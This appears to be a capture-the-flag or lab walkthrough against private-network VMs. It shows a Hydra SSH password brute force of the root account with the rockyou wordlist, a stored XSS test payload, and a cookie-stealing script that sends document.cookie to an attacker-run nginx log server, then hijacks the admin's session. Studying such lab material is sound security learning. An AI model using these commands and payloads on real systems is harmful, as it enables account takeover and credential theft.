10.2 : Web app exploitation - XSS (Part II)

Picking the lowest hanging fruit to crack

  • So right now we have 2 attack vector
  • SSH
  • Web Service

Cracking ssh

For the ssh, we can launch a ssh brute force crack for background job.

root@kali:~# locate rockyou
/usr/share/hashcat/masks/rockyou-1-60.hcmask
/usr/share/hashcat/masks/rockyou-2-1800.hcmask
/usr/share/hashcat/masks/rockyou-3-3600.hcmask
/usr/share/hashcat/masks/rockyou-4-43200.hcmask
/usr/share/hashcat/masks/rockyou-5-86400.hcmask
/usr/share/hashcat/masks/rockyou-6-864000.hcmask
/usr/share/hashcat/masks/rockyou-7-2592000.hcmask
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/john/rules/rockyou-30000.rule
/usr/share/wordlists/rockyou.txt.gz
root@kali:~# cd /usr/share/wordlists/
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -la
total 136660
drwxr-xr-x   2 root root      4096 Nov  5 19:31 .
drwxr-xr-x 338 root root     12288 Oct 24 23:24 ..
lrwxrwxrwx   1 root root        25 Oct 24 23:14 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx   1 root root        30 Oct 24 23:14 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx   1 root root        41 Oct 24 23:14 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx   1 root root        45 Oct 24 23:14 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx   1 root root        46 Oct 24 23:14 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx   1 root root        41 Oct 24 23:14 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r--   1 root root 139921507 Jul 17 02:59 rockyou.txt
lrwxrwxrwx   1 root root        25 Oct 24 23:14 wfuzz -> /usr/share/wfuzz/wordlist
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt

root@kali:/usr/share/wordlists# hydra -v -l root -P /usr/share/wordlists/rockyou.txt -t 3 192.168.56.104 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-05 19:33:07
[DATA] max 3 tasks per 1 server, overall 3 tasks, 14344399 login tries (l:1/p:14344399), ~4781467 tries per task
[DATA] attacking ssh://192.168.56.104:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.104:22

Cracking Web service - xss

Back to our browser, we saw this…

Service recon
Screen-Shot-2019-11-06-at-11.34.38-AM

In comment section, there is an xss vector.
Screen-Shot-2019-11-06-at-11.35.03-AM

Lets try <script>alert("xss");</script> as payload.
Screen-Shot-2019-11-06-at-11.35.45-AM

Got it.
Screen-Shot-2019-11-06-at-11.35.48-AM

Cracking Web service - xss - stealing user Credential

We can get the credentials via stealing document.cookie attack vector.

Add access_log /var/log/nginx.log; in nginx config file

service nginx start

Lets try our log server.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>

root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0)
 Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20
100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh
; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gec
ko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"

Success.

Lets inject this sneaky script into our target.

`<script>
    var img = document.createElement("img");
    img.src = "http://192.168.56.101/?cred="+document.cookie;
    document.body.appendChild(img);
</script>`

waita bit for the admin to take the bait..

nginx/     nginx.log
root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0)
 Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20
100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh
; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gec
ko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
192.168.56.1 - - [05/Nov/2019:19:55:56 -0800] "GET /?cred=PHPSESSID=e3dk856nao88pv2fokmhkmm9b7 HTTP/1.1" 200 3437 "http://192.168.56.104/pos
t.php?id=2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.104 - - [05/Nov/2019:19:56:05 -0800] "GET /?cred=PHPSESSID=nl65c43q2vfjd77ebebv2dgko1 HTTP/1.1" 200 3437 "http://127.0.0.1/post.p
hp?id=2" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.1 Safari/534.34"

GOT IT.
PHPSESSID=nl65c43q2vfjd77ebebv2dgko1

Change our cookies with Cookie Editor, and lets try to get into our panel.

Screen-Shot-2019-11-06-at-11.59.03-AM

Pwned.